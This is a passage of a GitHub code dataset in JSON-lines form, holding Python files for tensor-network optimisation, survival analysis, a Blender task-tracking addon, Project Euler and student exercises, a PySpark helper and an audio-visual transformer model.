Get\n element_sr = state.ansatz.elements(None) # Set real part\n element_si = state.ansatz.elements(None) # Set imag part\n element_r = state.ansatz.elements(None) # Reset\n element_grad = state.ansatz.elements(grad) # Get gradient\n\n element_sr.send(None)\n element_si.send(None)\n element_r.send(None)\n for value, calculated_grad in zip(element_g, element_grad):\n # value is a torch tensor which may be updated later, so copy it by converting it to a normal Python\n # number.\n if np.iscomplex(value):\n value = complex(value)\n else:\n value = float(value)\n calculated_grad = calculated_grad.real\n send(element_sr, value + delta)\n now_energy = get_energy()\n rgrad = (now_energy - original_energy) / delta\n if np.iscomplex(value):\n send(element_si, value + delta * 1j)\n now_energy = get_energy()\n igrad = (now_energy - original_energy) / 
delta\n cgrad = rgrad + igrad * 1j\n else:\n cgrad = rgrad\n send(element_r, value)\n showln(\" \", abs(calculated_grad - cgrad) / abs(cgrad), cgrad, calculated_grad)\n\n\ndef line_search(state, observer, grad, energy_observer, configuration_pool, step_size, line_search_amplitude):\n saved_state = list(state.ansatz.tensors(None))\n\n def restore_state():\n setter = state.ansatz.tensors(None)\n setter.send(None)\n for tensor in saved_state:\n send(setter, tensor)\n\n grad_dot_begin = mpi_comm.bcast(state.state_dot(grad, observer.gradient))\n if grad_dot_begin > 0:\n state.apply_gradient(grad, step_size)\n with energy_observer:\n energy_observer(configuration_pool)\n grad_dot_end = mpi_comm.bcast(state.state_dot(grad, energy_observer.gradient))\n showln(f\"predict eta={step_size}, energy={energy_observer.energy}, gradient dot={grad_dot_end}\")\n restore_state()\n\n if grad_dot_end > 0:\n step_size *= line_search_amplitude\n showln(f\"step_size is chosen as {step_size}, since grad_dot(begin) > 0, grad_dot(end) > 0\")\n else:\n step_size /= line_search_amplitude\n showln(f\"step_size is chosen as {step_size}, since grad_dot(begin) > 0, grad_dot(end) <= 0\")\n else:\n step_size = step_size\n showln(f\"step_size is chosen as {step_size}, since grad_dot(begin) < 0\")\n\n return mpi_comm.bcast(step_size)\n\n\ndef gradient_descent(\n state: AnsatzProductState,\n sampling_total_step=0,\n grad_total_step=1,\n grad_step_size=0,\n *,\n # About sampling\n multichain_number=1,\n sampling_method=\"sweep\",\n sampling_configurations=[],\n sweep_hopping_hamiltonians=None,\n # About subspace\n restrict_subspace=None,\n # About observe\n observe_max_batch_size=None,\n # About gradient method\n use_check_difference=False,\n use_line_search=False,\n use_fix_relative_step_size=False,\n momentum_parameter=0.0,\n # About natural gradient\n use_natural_gradient=False,\n conjugate_gradient_method_step=20,\n conjugate_gradient_method_error=0.0,\n metric_inverse_epsilon=0.01,\n cache_natural_delta=None,\n # About log and save state\n log_file=None,\n save_state_file=None,\n save_configuration_file=None,\n # About line search\n line_search_amplitude=1.2,\n line_search_parameter=0.6,\n # About momentum\n orthogonalize_momentum=False,\n # About check difference\n check_difference_delta=1e-8,\n # About Measurement\n measurement=None):\n\n time_str = datetime.now().strftime(\"%Y-%m-%d-%H:%M:%S\")\n\n # Gradient step\n use_gradient = grad_step_size != 0 or use_check_difference\n if use_gradient:\n if use_check_difference:\n grad_total_step = 1\n else:\n grad_total_step = grad_total_step\n else:\n grad_total_step = 1\n showln(f\"gradient total step={grad_total_step}\")\n\n # Restrict subspace\n if restrict_subspace is not None:\n origin_restrict = get_imported_function(restrict_subspace, \"restrict\")\n restrict = restrict_wrapper(origin_restrict)\n else:\n restrict = None\n\n # Prepare observers\n observer = Observer(\n state,\n enable_energy=True,\n enable_gradient=use_gradient,\n enable_natural_gradient=use_natural_gradient,\n cache_natural_delta=cache_natural_delta,\n restrict_subspace=restrict,\n max_batch_size=observe_max_batch_size,\n )\n if measurement:\n measurement_names = measurement.split(\",\")\n for measurement_name in measurement_names:\n observer.add_observer(measurement_name, get_imported_function(measurement_name, \"measurement\")(state))\n if use_gradient:\n need_energy_observer = use_line_search or use_check_difference\n else:\n need_energy_observer = False\n if need_energy_observer:\n energy_observer = 
Observer(\n state,\n enable_energy=True,\n enable_gradient=use_line_search,\n restrict_subspace=restrict,\n max_batch_size=observe_max_batch_size,\n )\n\n # Main loop\n with SignalHandler(signal.SIGINT) as sigint_handler:\n for grad_step in range(grad_total_step):\n if need_energy_observer:\n configuration_pool = []\n # Sampling and observe\n with seed_differ, observer:\n # Sampling method\n if sampling_method == \"sweep\":\n if sweep_hopping_hamiltonians is not None:\n hopping_hamiltonians = get_imported_function(sweep_hopping_hamiltonians,\n \"hopping_hamiltonians\")(state)\n else:\n hopping_hamiltonians = None\n sampling = SweepSampling(state, multichain_number, restrict, hopping_hamiltonians)\n sampling_total_step = sampling_total_step\n # Initial sweep configuration\n if len(sampling_configurations) < mpi_size * multichain_number:\n choose_generator = TAT.random.uniform_int(0, len(sampling_configurations) - 1)\n choose = [choose_generator() for _ in range(multichain_number)]\n else:\n choose = [mpi_rank * multichain_number + i for i in range(multichain_number)]\n for configuration_i, choose_i in zip(sampling.configuration, choose):\n configuration_i.import_configuration(sampling_configurations[choose_i])\n elif sampling_method == \"ergodic\":\n sampling = ErgodicSampling(state, multichain_number, restrict)\n sampling_total_step = sampling.total_step\n else:\n raise ValueError(\"Invalid sampling method\")\n # Sampling run\n # total_sampling_pool[sampling step][process rank][chain index]\n for sampling_step in range(sampling_total_step):\n if sampling_step % (mpi_size * multichain_number) == mpi_rank * multichain_number:\n bound = sampling_total_step - sampling_step\n sampling_result = sampling()[:bound]\n observer(sampling_result)\n if need_energy_observer:\n configuration_pool += sampling_result\n show(f\"sampling {sampling_step}/{sampling_total_step}, energy={observer.energy}\")\n # Save configuration\n gathered_configurations = mpi_comm.allgather(\n [configuration.export_configuration() for _, configuration in sampling_result])\n sampling_configurations.clear()\n for config in gathered_configurations:\n sampling_configurations += config\n showln(f\"sampling done, total_step={sampling_total_step}, energy={observer.energy}\")\n\n # Measure log\n if measurement and mpi_rank == 0:\n for measurement_name in measurement_names:\n measurement_result = observer.result[measurement_name]\n measurement_whole_result = None\n # TODO ansatz product state does not implement it yet.\n save_result = get_imported_function(measurement_name, \"save_result\")\n save_result(state, measurement_result, measurement_whole_result)\n # Energy log\n if log_file and mpi_rank == 0:\n with open(log_file.replace(\"%t\", time_str), \"a\", encoding=\"utf-8\") as file:\n print(*observer.energy, file=file)\n\n if use_gradient:\n\n # Get gradient\n if use_natural_gradient:\n grad = observer.natural_gradient(conjugate_gradient_method_step, conjugate_gradient_method_error,\n metric_inverse_epsilon)\n else:\n grad = observer.gradient\n\n # Change state\n if use_check_difference:\n showln(\"checking difference\")\n check_difference(state, observer, grad, energy_observer, configuration_pool, check_difference_delta)\n\n elif use_line_search:\n showln(\"line searching\")\n grad *= (state.state_dot() / state.state_dot(grad, grad))**0.5\n grad_step_size = line_search(state, observer, grad, energy_observer, configuration_pool,\n grad_step_size, line_search_amplitude)\n state.apply_gradient(grad, grad_step_size * 
line_search_parameter)\n else:\n if grad_step == 0 or momentum_parameter == 0.0:\n total_grad = grad\n else:\n if orthogonalize_momentum:\n param = state.state_dot(total_grad) / state.state_dot()\n for index, tensor in enumerate(state.ansatz.tensors(None)):\n total_grad[index] -= tensor * param\n total_grad = total_grad * momentum_parameter + grad * (1 - momentum_parameter)\n this_grad = total_grad\n if use_fix_relative_step_size:\n this_grad *= (state.state_dot() / state.state_dot(this_grad, this_grad))**0.5\n state.apply_gradient(this_grad, grad_step_size)\n showln(f\"grad {grad_step}/{grad_total_step}, step_size={grad_step_size}\")\n\n # Normalize state\n observer.normalize_state()\n # Bcast state\n state.bcast_state()\n\n # Save state\n if save_state_file:\n write_to_file(state, save_state_file.replace(\"%s\", str(grad_step)).replace(\"%t\", time_str))\n if save_configuration_file:\n write_to_file(sampling_configurations, save_configuration_file)\n\n # Yield the energy\n yield observer.energy\n if sigint_handler():\n break\n","repo_name":"USTC-TNS/TAT","sub_path":"tetragono/tetragono/ansatz_product_state/gradient.py","file_name":"gradient.py","file_ext":"py","file_size_in_byte":12313,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"7896493292","text":"from models import metrics, prepare_data\r\nimport numpy as np\r\nfrom table import draw_plot\r\nfrom sksurv.ensemble import ComponentwiseGradientBoostingSurvivalAnalysis\r\n\r\nX_train, y_train, X_test, y_test = prepare_data.get_train_test()\r\n\r\nrandom_state = 64\r\n\r\ncw_gbs = ComponentwiseGradientBoostingSurvivalAnalysis(loss='coxph',\r\n learning_rate=0.1,\r\n n_estimators=1000,\r\n dropout_rate=0.0,\r\n random_state=random_state)\r\n\r\ntimes = np.arange(365, 1826, 30)\r\ncw_gbs.fit(X_train, y_train)\r\n\r\n((train_plot, train_acc_auc), (test_plot, test_acc_auc)) = metrics.c_auc_score(cw_gbs, X_train, y_train, X_test, y_test, times)\r\ntrain_acc_bs, test_acc_bs = metrics.i_brier_score(cw_gbs, X_train, y_train, X_test, y_test, times)\r\ntrain_acc_icpw, test_acc_icpw = metrics.c_index_icpw(cw_gbs, X_train, y_train, X_test, y_test)\r\ntrain_acc_cindex, test_acc_cindex = metrics.c_index_censored(cw_gbs, X_train, y_train, X_test, y_test)\r\n\r\ndraw_plot(['Train', train_acc_cindex, train_acc_icpw, train_acc_auc, train_acc_bs],\r\n ['Test', test_acc_cindex, test_acc_icpw, test_acc_auc, test_acc_bs],\r\n 'CWGBS model')\r\n\r\nwith open('files_cancer_gov/cwgbs.npy', 'wb') as f:\r\n np.save(f, train_plot)\r\n np.save(f, test_plot)","repo_name":"k1rezaei/Survival-Analysis","sub_path":"dataset_and_other_models/cwgbs.py","file_name":"cwgbs.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8098689830","text":"from collections import deque\n\n\ndef find_permutations(nums):\n result = []\n permutations = deque()\n permutations.append([])\n for i in range(len(nums)):\n size = len(permutations)\n for _ in range(size):\n old_permutation = permutations.popleft()\n for j in range(len(old_permutation) + 1):\n new_permutation = list(old_permutation)\n new_permutation.insert(j, nums[i])\n if len(new_permutation) == len(nums):\n result.append(new_permutation)\n else:\n permutations.append(new_permutation)\n\n return result\n\n\ndef main():\n print(\"Here are all the permutations: \" + str(find_permutations([1, 3, 
5])))\n\n\nmain()\n","repo_name":"terrifyzhao/educative4","sub_path":"10_subsets/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26913101280","text":"#!/usr/bin/env python\n\nimport pandas as pd\nimport plumed_pandas\nimport argparse\nimport numpy as np\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('-f', help='give 2dpmf_clean.txt file', action='store', dest='f', type=str)\n parser.add_argument('-o', help='give path for projected data output', action='store', dest='o')\n args = parser.parse_args()\n\n #open 2dwham output\n df = pd.read_table(args.f, delim_whitespace=True, dtype={'#X': np.float64, 'Y': np.float64, 'Free': np.float64, 'Pro': np.float64})\n\n #computing Prob from free nrg because not enough decimals in Pro column\n df['Pro2'] = np.exp((df['Free'])/-2.494)\n\n #Projection on nCV: adding all proba in same nCV values\n aggregation_functions = {'Pro2': 'sum'}\n df_new = df.groupby(df['#X']).aggregate(aggregation_functions)\n df_new=df_new.reset_index()\n\n #recomputing free from Prob\n df_new['Free2'] = -2.494*np.log(df_new['Pro2'])\n\n #save projected Free_nrg and Prob\n if args.o == None:\n np.savetxt(r'./1dpmf.txt', df_new.values, header=\"nCV Prob Free\", fmt='%.3f')\n else:\n np.savetxt(args.o, df_new.values, header=\"nCV Prob Free\", fmt='%.3f')\n\n# If called from the command line...\nif __name__ == \"__main__\":\n main()\n","repo_name":"jerem2401/scripts","sub_path":"wham/projection.py","file_name":"projection.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28666814340","text":"from pipeline import *\n\n\n\nif __name__ == '__main__':\n\n\n\n super_download_folder_title = 'tripadvisor_downloads'\n\n ## The dictionary here was designed to structure downloads in folders based on different criteria\n ## The key in the dictionary can be the city, a hotel chain, a country, a continent, etc. 
\n    ## \n    search_dict = {\n        'asia':['india'],\n        'europe':['England'],\n        'Continent':['Europe']\n    }\n\n    \n    ## Multiprocessing is used only in one key value pair\n    pipeline(super_download_folder_title, search_dict, num_pages = 1, num_workers = 8)\n    ","repo_name":"teenaxta/Tripadvisor-Image-Scrapper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"15473499586","text":"bl_info = {\n    \"name\": \"BTT Blender Tasks Tracking\",\n    \"blender\": (2, 80, 0),\n    \"category\": \"Object\",\n}\n\nimport bpy\nfrom bpy.types import Panel, Operator\nfrom bpy.props import StringProperty, EnumProperty\n\n# Define task properties\nclass Task:\n    def __init__(self, name, description, priority, status, due_date, doer):\n        self.name = name\n        self.description = description\n        self.priority = priority\n        self.status = status\n        self.due_date = due_date\n        self.doer = doer\n\n# Define task list\ntasks = []\n\n# Define task creation operator\nclass BTT_CreateTaskOperator(Operator):\n    bl_idname = \"btt.create_task_operator\"\n    bl_label = \"Create Task\"\n    bl_options = {'REGISTER', 'UNDO'}\n\n    # Task properties inputs\n    name: StringProperty(name=\"Task Name\")\n    description: StringProperty(name=\"Task Description\")\n    priority: EnumProperty(\n        name=\"Priority\",\n        items=[\n            (\"LOW\", \"Low\", \"Low priority task\"),\n            (\"MEDIUM\", \"Medium\", \"Medium priority task\"),\n            (\"HIGH\", \"High\", \"High priority task\"),\n        ]\n    )\n    status: EnumProperty(\n        name=\"Status\",\n        items=[\n            (\"TODO\", \"Todo\", \"Task not started\"),\n            (\"DOING\", \"Doing\", \"Task in progress\"),\n            (\"DONE\", \"Done\", \"Task completed\"),\n        ]\n    )\n    due_date: StringProperty(name=\"Due Date\")\n    doer: StringProperty(name=\"Doer\")\n\n    def invoke(self, context, event):\n        # Pop up a dialog so the user can fill in the task properties\n        return context.window_manager.invoke_props_dialog(self)\n\n    def execute(self, context):\n        # Create task and add to task list\n        task = Task(self.name, self.description, self.priority, self.status, self.due_date, self.doer)\n        tasks.append(task)\n\n        return {'FINISHED'}\n\n# Define task deletion operator\nclass BTT_DeleteTaskOperator(Operator):\n    bl_idname = \"btt.delete_task_operator\"\n    bl_label = \"Delete Task\"\n\n    index: bpy.props.IntProperty()\n\n    def execute(self, context):\n        # Remove task from task list\n        del tasks[self.index]\n\n        return {'FINISHED'}\n\n# Define task display panel\nclass BTT_TaskDisplayPanel(Panel):\n    bl_idname = \"BTT_TaskDisplayPanel\"\n    bl_label = \"Tasks\"\n    bl_space_type = \"VIEW_3D\"\n    bl_region_type = \"UI\"\n    bl_category = \"BTT Tasks Tracking\"\n\n    def draw(self, context):\n        layout = self.layout\n\n        # Display task list\n        for i, task in enumerate(tasks):\n            row = layout.row()\n            row.operator(\"btt.delete_task_operator\", text=\"\", icon=\"X\").index = i\n            row.label(text=task.name)\n            row.label(text=task.due_date)\n\n        # Add task creation button; a panel cannot draw the operator's\n        # properties via self, so the operator opens its own dialog instead\n        box = layout.box()\n        box.label(text=\"Create New Task\")\n        box.operator(\"btt.create_task_operator\")\n\n# Register addon\ndef register():\n    bpy.utils.register_class(BTT_CreateTaskOperator)\n    bpy.utils.register_class(BTT_DeleteTaskOperator)\n    bpy.utils.register_class(BTT_TaskDisplayPanel)\n\ndef unregister():\n    bpy.utils.unregister_class(BTT_CreateTaskOperator)\n    bpy.utils.unregister_class(BTT_DeleteTaskOperator)\n    bpy.utils.unregister_class(BTT_TaskDisplayPanel)\n\nif __name__ == \"__main__\":\n    
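# Register immediately when the script is run from Blender's text editor\n    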
register()\n","repo_name":"nafergo/blender-scripts","sub_path":"btt.py","file_name":"btt.py","file_ext":"py","file_size_in_byte":3234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"14299338886","text":"#!C:\\Python33\\python.exe\n#https://projecteuler.net/problem=23\nfrom Prime import prime3\n\nceiling = 28123\nfloor = 12\n\ncandidates = set(range(1, ceiling + 1))\nabundent_numbers = []\n\nfor num in range(floor, (ceiling + 1 - floor)):\n    if num < sum(prime3.factor_list(num)[:-1]):\n        abundent_numbers.append(num)\n\nwhile len(abundent_numbers) > 0:\n    addend1 = abundent_numbers.pop()\n\n    for addend2 in abundent_numbers:\n        abundent_sum = addend1 + addend2\n        if abundent_sum > ceiling:\n            break\n        if abundent_sum in candidates:\n            candidates.remove(abundent_sum)\n    \n    double_addend = 2*addend1\n    if double_addend <= ceiling:\n        if double_addend in candidates:\n            candidates.remove(double_addend)\n    \n\nanswer = sum(candidates)\n\nprint(answer)\nfrom tkinter import Tk\nr = Tk()\nr.withdraw()\nr.clipboard_clear()\nr.clipboard_append(answer)\n","repo_name":"JustinL42/Project-Euler","sub_path":"023.py","file_name":"023.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"24745402438","text":"import math\r\nprint(\"a*(x^2) + b*x + c = 0\")\r\n\r\nfirstnumber = float(input(\"adad aval ro vared kon\"))\r\nnumber2 = float(input(\"adad dovom ro vared kon\"))\r\nnumber3 = float(input(\"adad sevom ro vared kon\"))\r\n\r\n# compute the discriminant first so a negative value never reaches math.sqrt\r\nd = (number2 ** 2) - (4 * firstnumber * number3)\r\n\r\nif d > 0:\r\n    a = math.sqrt(d)\r\n    print(\"javab aval hast\", ((-1 * number2) + a) / (2 * firstnumber))\r\n    print(\"javab dovom hast\", ((-1 * number2) - a) / (2 * firstnumber))\r\nelif d == 0:\r\n    print(\"javab hast\", (-1 * number2) / (2 * firstnumber))\r\nelse:\r\n    print(\"bedeon javab\")","repo_name":"roozbehsaffarkhorasani/assignment4","sub_path":"11.py","file_name":"11.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"}
{"seq_id":"34869701544","text":"import logging\nimport os\nfrom typing import List, Optional\n\nfrom pyspark import SparkConf\nfrom pyspark.sql import SparkSession\n\nSTANDALONE = \"local[*]\"\n\n\ndef quiet_py4j():\n    logger = logging.getLogger(\"py4j\")\n    logger.setLevel(logging.INFO)\n\n\nclass SparkProvider:\n    def __init__(\n        self: \"SparkProvider\",\n        app_name: str,\n        conf: Optional[SparkConf] = None,\n        extra_dependencies: Optional[List[str]] = None,\n        extra_files: Optional[List[str]] = None,\n    ) -> None:\n        self.spark = self.set_up_spark(\n            app_name, self.master, conf, extra_dependencies, extra_files\n        )\n\n    @property\n    def master(self: \"SparkProvider\") -> str:\n        return os.getenv(\"SPARK_MASTER\", STANDALONE)\n\n    @staticmethod\n    def set_up_spark(\n        app_name: str,\n        master: str = STANDALONE,\n        conf: SparkConf = None,\n        extra_dependencies: List[str] = None,\n        extra_files: List[str] = None,\n    ) -> SparkSession:\n        conf = conf if conf else SparkConf()\n\n        if extra_dependencies:\n            spark_dependencies = \",\".join(extra_dependencies)\n            conf.set(\"spark.jars.packages\", spark_dependencies)\n\n        spark = (\n            SparkSession.builder.appName(app_name)\n            .master(master)\n            .config(conf=conf)\n            .getOrCreate()\n        )\n\n        extra_files = extra_files if extra_files else []\n        for extra_file in extra_files:\n            spark.sparkContext.addPyFile(extra_file)\n\n        quiet_py4j()\n        return spark\n\n    @staticmethod\n    
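# Companion to set_up_spark: stops the session once a job or test run finishes\n    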
def tear_down_spark(spark: SparkSession) -> None:\n        spark.stop()\n        # To avoid Akka rebinding to the same port, since it doesn't unbind\n        # immediately on shutdown\n        spark._jvm.System.clearProperty(\"spark.driver.port\")\n","repo_name":"MrPowers/quinn","sub_path":"quinn/spark.py","file_name":"spark.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","stars":534,"dataset":"github-code","pt":"37"}
{"seq_id":"38727589251","text":"# Subject: AISC 1000_02 (Prof. Tim Nguyen)\n# Assignment: Application Exercise 02 s21\n# Student Name & Number: Keval Padsala (500199506)\n# Student Name & Number: Ria Sharma (500199506)\n# Student Name & Number: Archit Verma (500199506)\n\n\nimport os, sys, random\n\n################# <------------- start main region -------------> #################\n\nclass AppExc2s21():\n\n    def q1(self):\n        print(\"\\nSales Tax Calculator\") ####SALES TAX CALCULATOR####\n\n        def take_and_validate_input(): # Validate that the input is numeric and not negative.\n            while True:\n                inp = si()\n                try:\n                    inp = float(inp)\n                    if inp >= 0:\n                        return inp\n                    print(inp, \"Input must be greater than 0. Please enter valid input again.\", end=\": \")\n                except ValueError:\n                    print(\"\\\"\"+inp+\"\\\" Input is not Numeric. Please enter valid input again.\", end=\": \")\n\n        def count_tax_and_sales_tax(taxes): # Print total and sales tax.\n            print(\"Total:\", round(sum(taxes),2))\n            print(\"Sales tax:\", round(sum(taxes)*0.13, 2))\n\n        def count_total_after_tax(taxes): # Print total after tax.\n            print(\"Total after tax:\", round(sum(taxes) + sum(taxes)*0.13, 2))\n\n        count_more, taxes = True, []\n        while(count_more): # Loop with Y/y.\n            print(\"ENTER ITEMS (ENTER 0 TO END)\")\n            while True: # Loop to take input until zero.\n                print(\"Cost of item:\", end=\" \")\n                inp = take_and_validate_input()\n                \n                if(inp == 0):\n                    break\n                \n                taxes.append(inp)\n                count_tax_and_sales_tax(taxes)\n            count_total_after_tax(taxes)\n\n            print(\"Again? (y/n):\")\n            if si() not in [\"Y\",\"y\"]:\n                print(\"Thanks, bye!\")\n                count_more = False\n\n\n    def q2(self):\n        print(\"\\nDice Roller\") ####DICE ROLLER####\n\n        def take_and_validate_input(): # Validate that the input is between 1 and 6.\n            while True:\n                inp = si()\n                if inp.isdigit():\n                    inp = int(inp)\n                    if 1 <= inp <= 6:\n                        return inp\n                    print(inp, \"Input must be between 1 and 6. Please enter valid input again.\", end=\": \")\n                else:\n                    print(\"\\\"\"+inp+\"\\\" Input is not Numeric. Please enter valid input again.\", end=\": \")\n        \n        def roll_names(die1, die2): # Roll dice names(reference: \"https://en.wikipedia.org/wiki/Craps\").\n            rolls = {\n                (1,1): \"Snake Eyes\", \n                (1,2): \"Ace Deuce\", (2,2):\"Hard Four\", \n                (1,3): \"Easy Four\", (2,3): \"Five (Fever Five)\", (3,3): \"Hard Six\",\n                (1,4): \"Five (Fever Five)\", (2,4): \"Easy Six\", (3,4): \"Natural/Seven Out\", (4,4): \"Hard Eight\",\n                (1,5): \"Easy Six\", (2,5): \"Natural/Seven Out\", (3,5): \"Easy Eight\", (4,5): \"Nine (Nina)\", (5,5): \"Hard Ten\",\n                (1,6): \"Natural/Seven Out\", (2,6): \"Easy Eight\", (3,6): \"Nine (Nina)\", (4,6): \"Easy Ten\", (5,6): \"Yo (Yo-leven)\", (6,6): \"Boxcars/Midnight\"\n            }\n            return(rolls[min(die1, die2), max(die1, die2)])\n\n        def print_output(die1, die2): # Print Total & Output name.\n            print(\"Total:\", die1 + die2)\n            print(roll_names(die1, die2))\n\n\n        roll_more = True\n        \n        print(\"Roll the dice? 
(y/n):\")\n if si() not in [\"Y\",\"y\"]:\n roll_more = False\n\n while(roll_more): # Loop if user wants roll more dice.\n die1 = random.randint(1,7)\n print(\"Die 1:\", die1)\n die2 = random.randint(1,7)\n print(\"Die 1:\", die2)\n\n print_output(die1, die2)\n\n print(\"Roll the dice? (y/n):\")\n if si() not in [\"Y\",\"y\"]:\n roll_more = False\n\n def q3(self):\n print(\"\\nQuestion 3\") ####QUESTION 3####\n list1 = ['Python', 'Maths Data Science', 'Machine Learning', 'Step Presentation', 'Statistical Modelling and Inference', 1000, 1002, 1003, 1004, 1005]\n list2, list3 = [None]*5, [None]*5\n\n print(len(list1), len(list1)//2, -1)\n for i in range(len(list1), len(list1)//2, -1): # Loop in list1 from Length to (length/2).\n rand_choice = random.choice([i for i in range(len(list2)) if list2[i]==None]) #randomly select one from indices which has value None\n list2[rand_choice] = list1.pop() #pop() the value and add into list at radom position\n \n for i in range(len(list1), 0, -1): # Loop in list1 from (length/2) to 0.\n rand_choice = random.choice([i for i in range(len(list3)) if list3[i]==None]) #randomly select one from indices which has value None\n list3[rand_choice] = list1.pop() #pop() the value and add into list at radom position\n\n print(list2) #Print randomly create list2.\n print(list3) #Print randomly create list3.\n dict_l2_l3 = dict(zip(list2, list3))\n print(dict_l2_l3) #Print Dictionary from two lists.\n\n\n\n\ndef main():\n print(\"****Application Exercise 2s21****\")\n\n appExc2s21 = AppExc2s21()\n appExc2s21.q1()\n appExc2s21.q2()\n appExc2s21.q3()\n\n\n################# <------------- end main region -------------> #################\n###### normal io ######\n\ndef ii(): return int(input())\ndef si(): return input()\ndef mi(ss=\" \"): return map(int,input().strip().split(ss))\ndef msi(ss=\" \"): return map(str,input().strip().split(ss))\ndef li(ss=\" \"): return list(mi(ss))\n\ndef read():\n sys.stdin = open('../input.txt', 'r') \n sys.stdout = open('../output.txt', 'w') \n\n\nif __name__ == \"__main__\":\n # read() # uncomment to access an FILE IO.\n main()\n\n\n\n","repo_name":"Keval78/Programming_Solutions","sub_path":"PythonAssignment/AIDS Term1/AISC1000_Application_Exercise_2s21.py","file_name":"AISC1000_Application_Exercise_2s21.py","file_ext":"py","file_size_in_byte":6243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22199424942","text":"import sys\nsys.path.append('..')\n\n\nimport asyncio\nimport async_state\nfrom async_state import *\n\nprint('testing async_state')\n\nmotor_state = AsyncState(['deenergized', 'moving', 'stopped_at_target'])\n\nprint(f'The current state is {motor_state}')\nprint(f'All possible states are {motor_state.possible_states}')\n\n\nasync def test():\n print(f'Set motor to moving!')\n await motor_state.set('moving')\n\n if motor_state == 'moving':\n print(f'Motor is moving!')\n\n if motor_state != 'moving':\n raise RuntimeError(f'Motor is ambivalent!')\n\n if motor_state != 'stopped_at_target':\n print(f'Motor is not at target!')\n\n if motor_state < ['deenergized', 'stopped_at_target']:\n print(f'Motor state is not moving!')\n\n\n print(f'Turning off motor!')\n await motor_state.set('deenergized')\n\n if motor_state < ['deenergized', 'stopped_at_target']:\n print(f'Motor state is not moving!')\n\n\n try:\n if motor_state == 'flying':\n print(f'Motor is moving!')\n\n except BaseException as e:\n print(repr(e))\n\n\n\n\n\nloop = 
asyncio.get_event_loop()\nloop.run_until_complete(test())\n\n\n\n\n\n\n\n\n\n\n","repo_name":"deniz195/async_state","sub_path":"tests/test_ops.py","file_name":"test_ops.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39027559158","text":"import copy\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\n\nfrom models.build import MODEL_REGISTRY\nfrom models.encoding_helper import SummaryEncoding\nfrom models.bert import (\n BertConfig,\n BertEmbeddings,\n Bert\n)\nfrom models.albert import (\n AlbertConfig,\n AlbertEmbeddings,\n Albert\n)\n\n\ndef _identity(x, attention_mask=None, modality_idx=0):\n return [x]\n\n\n@MODEL_REGISTRY.register()\nclass AVBert(nn.Module):\n \"\"\"\n Multimodal Transformer model builder.\n It builds a multimodal Transformer backbone that takes audio and visual\n sequences as the input.\n \"\"\"\n def __init__(self, cfg):\n super(AVBert, self).__init__()\n self.cfg = cfg\n # Shring across layers\n transformer_cfg_func = \\\n AlbertConfig if cfg.TRANSFORMER.SHARING_ACROSS_LAYERS else BertConfig\n transformer_embeddings = \\\n AlbertEmbeddings if cfg.TRANSFORMER.SHARING_ACROSS_LAYERS else \\\n BertEmbeddings\n transformer_model = \\\n Albert if cfg.TRANSFORMER.SHARING_ACROSS_LAYERS else Bert\n transformer_cfg = transformer_cfg_func.from_dict(\n {key.lower(): value for key, value in cfg.TRANSFORMER.items()}\n )\n\n self.num_modalities = 2 if 'visual_audio' in cfg.MODEL.ARCH else 1\n self.idx2modality = []\n if 'visual' in cfg.MODEL.ARCH:\n self.visual_conv = MODEL_REGISTRY.get(cfg.VIS.MODEL_NAME)(cfg)\n self.visual_fc = nn.Linear(\n self.visual_conv.head.output_size, transformer_cfg.hidden_size\n )\n self.visual_norm = nn.LayerNorm(\n transformer_cfg.hidden_size, transformer_cfg.layer_norm_eps\n )\n self.idx2modality.append('visual')\n if 'audio' in cfg.MODEL.ARCH:\n self.audio_conv = MODEL_REGISTRY.get(cfg.AUD.MODEL_NAME)(cfg)\n self.audio_fc = nn.Linear(\n self.audio_conv.output_size, transformer_cfg.hidden_size\n )\n self.audio_norm = nn.LayerNorm(\n transformer_cfg.hidden_size, transformer_cfg.layer_norm_eps\n )\n self.idx2modality.append('audio')\n\n self.modality2idx = \\\n {value: idx for idx, value in enumerate(self.idx2modality)}\n\n # BOS embeddings\n self.summary_encoding = SummaryEncoding(\n self.idx2modality,\n transformer_cfg.hidden_size,\n transformer_cfg.use_mean_pooling,\n cfg.DATA.SEQUENCE_LENGTH,\n transformer_cfg.layer_norm_eps\n )\n\n # Modality fusion strategies\n if cfg.MODEL.FUSION == 'early':\n assert 'visual_audio' in cfg.MODEL.ARCH\n for i in range(self.num_modalities):\n setattr(\n self,\n f\"single_{self.idx2modality[i]}_embeddings\",\n lambda x: x\n )\n setattr(\n self,\n f\"single_{self.idx2modality[i]}_transformer\",\n _identity\n )\n transformer_cfg.num_modality_groups = 1\n self.multi_embeddings = \\\n transformer_embeddings(transformer_cfg, True)\n self.multi_transformer = transformer_model(transformer_cfg)\n elif cfg.MODEL.FUSION == 'mid':\n assert 'visual_audio' in cfg.MODEL.ARCH\n transformer_cfg.num_modality_groups = self.num_modalities + 1\n for i in range(self.num_modalities):\n self.add_module(\n f\"single_{self.idx2modality[i]}_embeddings\",\n transformer_embeddings(transformer_cfg, False)\n )\n 